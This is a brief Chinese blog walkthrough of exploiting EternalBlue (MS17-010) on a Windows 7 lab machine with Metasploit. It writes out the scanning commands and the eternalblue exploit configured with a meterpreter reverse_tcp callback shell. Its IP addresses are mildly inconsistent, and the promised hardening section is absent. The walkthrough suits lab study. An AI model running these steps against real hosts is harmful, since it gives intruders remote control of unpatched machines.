
永恒之蓝ms17-010
2025年3月19日大约 2 分钟
永恒之蓝ms17-010
MS17_010漏洞利用与安全加固(永恒之蓝)
之前做过就直接放出来啦
- 原理:
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
- 开始
1.断开防火墙,windos 7 的防火墙关闭

2.实现相互ping通


环境弄好了,正文开始!172.16.17.0
3.在kali当中启动metasploit工具,
通过执行msfconsole指令进行启动。

4.Search命令搜索ms17-010漏洞扫描模块,图中圈中的就是漏洞扫描模块。
执行:
search ms17-010 //搜索ms17-010相关漏洞利用模块
执行:
msf > use auxiliary/scanner/smb/smb_ms17_010 (利用模块该扫描模块并且设置相关扫描范围信息)。**执行:
use auxiliary/scanner/smb/smb_ms17_010 //选择使用该模块执行搜索选项
set rhosts 192.168.6.0/24 //设置扫描的网段范围
set threads 20 //设置扫描的线程,数值越大扫描速度越快
run //开始运行即开始执行扫描
6.执行扫描过后,结果如下所示,从结果中可以看到在当前扫描的网段中存在一个windows 7版本的操作系统存在ms17-010漏洞。(192.168.6.135就是window 7的IP)

192.168.32.136:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
7.接下来进行漏洞利用过程即可,
执行:
use exploit/windows/smb/ms17_010_eternalblue //选择漏洞利用模块
set payload windows/x64/meterpreter/reverse_tcp //设置漏洞利用完成后的反弹模块,用以接收回馈信息
set lhost 192.168.6.130//设置反弹IP地址
set lport 5555 //设置反弹端口
set rhost 192.168.6.135 //设置被攻击的目标主机
执行:
show options //检查设定的信息
执行:
run或
exploit //开始进行漏洞利用
看到WIN了吗?你就成功了!!!
